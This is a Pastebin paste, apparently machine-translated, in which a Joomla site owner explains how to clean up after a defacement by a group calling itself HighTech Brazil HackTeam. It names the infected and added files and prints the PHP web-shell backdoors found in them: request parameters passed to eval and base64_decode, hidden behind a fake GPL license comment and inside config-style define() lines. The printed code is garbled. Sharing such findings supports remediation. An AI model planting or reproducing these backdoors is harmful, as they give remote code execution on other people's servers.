mightyroot

hacked sites HighTech Brazil

May 6th, 2013
434
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 4.93 KB | None | 0 0
  1. Find those files that have been hacked:
  2. copyright.php
  3. changelog.php
  4. Where there are these lines added:
  5. (I compared with my other non hacked Joomla 1.5.26 site - Important: it seems that research on the content of the file with the value $ gnu enough to locate)
  6.  
  7. In header file:
  8.  
  9. <? PHP
  10. / * GNU GENERAL PUBLIC LICENSE
  11. TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
  12. This program is free software, you can redistribute it and / or modify
  13. it under the terms of the GNU General Public License as published by
  14. the Free Software Foundation; Either Version 2 of the License, or
  15. (At your option) any later versions.
  16.  
  17. This program is distributed in the hope That It Will Be useful,
  18. goal WITHOUT ANY WARRANTY, without even the implied warranty of
  19. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  20. GNU General Public License for more details.
  21.  
  22. GNU GENERAL PUBLIC LICENSE
  23. Version 2, June 1991
  24.  
  25. * / Copyright6_7_78 () / * 1989, 1991 Free Software Foundation, Inc.
  26.                           675 Mass Ave, Cambridge, MA 02139, USA
  27.  Everyone is permitted to copy and distribute verbatim copies
  28.  of this license document order changing it is not allowed.
  29.  
  30. Preamble
  31.  
  32.   The MOST licenses for software are designed to take away your
  33. freedom to share and change it. By contrast, the GNU General Public
  34. License is Intended to guarantee your freedom to share and change free
  35. software - to make safe the software is free for all users icts. This
  36. General Public License Applies to MOST of the Free Software
  37. Foundation's software and to any other program Whose authors commit to
  38. using it. (Some other Free Software Foundation software is covered by
  39. the GNU Library General Public License INSTEAD.) You can apply it to
  40. your programs, too. * />
  41.  
  42. And bottom of the file:
  43.  
  44. Copyright6_7_78 ();
  45. Copyright6_7_78 function () {
  46. static $ gnu = true;
  47. return if ($ gnu!)
  48. if (! isset ($ _REQUEST ['gnu']) | | isset ($ _REQUEST ['c_id'])) return;
  49. $ Gpl = implode ('', $ _REQUEST ['gnu']);
  50. eval ($ gpl ($ _REQUEST ['c_id']));
  51. $ Gnu = false;
  52. }
  53. >
  54.  
  55. Once the files containing the localized code, clean up and leave ...
  56.  
  57. Find the files that have been added:
  58.  
  59. The directories listed are only my opinion, they seem to generate the names of existing files in Joomla so that we do not care - Important: it seems that research on the content of the file settings.xml enough value to locate them.
  60. All2.php
  61. html4strict.php (and variations of the name or kind html4strict1.php html4strict1.bak.php everywhere)
  62. pageNavigation.bak.php (File "includes")
  63. pageNavigation.class.php (File "includes")
  64. CREDITS.php (in many cases)
  65. loader.1.php (File "book")
  66. loader.bak.php (File "book")
  67. LICENCE.php (File "media" and "modules")
  68. article5.clas.php (in many cases)
  69. news2.clas.php (in many cases)
  70.  
  71. Here are the contents of these files (at least for me):
  72.  
  73. <? PHP
  74. define ('REAL_SERVER_ROOT', 'SERVER');
  75. / / DIR
  76. define ('SERVER_ROOT', '.');
  77. define ('SERVER_VERSION', '2 .5 ');
  78. define ('BOOT_DIR', 'bootstrap');
  79. define ('SYSTEM_DIR', 'system');
  80. define ('SYSTEM_CONF_DIR', 'conf');
  81. define ('SYSTEM_CONF_PATH' SERVER_ROOT '/' SYSTEM_DIR '/' SYSTEM_CONF_DIR....)
  82. define ('KERNEL_DIR', 'kernel');
  83. define ('SERVICES_DIR', 'services');
  84. define ('LIBRARIES_DIR', 'libs');
  85. define ('FRAMEWORKS_DIR', 'Frameworks');
  86. define ('IMPLEMENTATIONS_DIR', 'implementations');
  87. define ('EXTERN_DIR', 'external');
  88. / / APP
  89. define ('APPS_DIR', 'apps');
  90. define ('USERS_DIR', 'users');
  91. define ('USERS_PATH' SERVER_ROOT '/' USERS_DIR..)
  92. define ('USERS_CONF_DIR', 'conf');
  93. define ('USERS_FILES_DIR', 'files');
  94. define ('SYSTEM_SKEL_DIR', 'skel')? @ Eval (base64_decode ($ _REQUEST ['c_id'])) define ('SYSTEM_SKEL_PATH' SYSTEM_CONF_PATH '/' SYSTEM_SKEL_DIR..)
  95. define ('USERS_SHARE_DIR', 'share');
  96. define ('USERS_META_DIR', 'meta');
  97. define ('USERS_META_SETTINGS_FILENAME', 'settings.xml');
  98. define ('WORKGROUPS_DIR', 'workgroups');
  99. define ('WORKGROUPS_PATH' SERVER_ROOT '/' WORKGROUPS_DIR..)
  100. / / CONF
  101. define ('WORKGROUPS_CONF_DIR', 'conf');
  102. define ('WORKGROUPS_FILES_DIR', 'files');
  103. define ('WORKGROUPS_METAFILES_DIR', 'metafiles');
  104. define ('WORKGROUPS_META_DIR', 'meta');
  105. define ('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
  106. >
  107.  
  108. The file index.php or index.html
  109.  
  110. Index.qqchose several files are modified. They contain the code
  111. Hackeado por HighTech Brazil HackTeam
  112. No \ One - CrazyDuck - Otrasher - L34NDR0
  113. That appears everywhere.
  114. The then replace it with a clean file installs clean or just replace the code with the following:
  115. <html> <body bgcolor="#FFFFFF"> </ body> </ html>
  116. should suffice.
  117. Conclusion
  118.  
  119. Once the cleaned their hack or completely deleted files, then once a solid htaccess. Generated, the site should be safe in the future. For now the case from 18 January 2013. If adventure should continue, I will update this file.
  120. Evernote makes it easy to remember things big and small from your everyday life using your computer, tablet, phone and the web.
Add Comment
Please, Sign In to add comment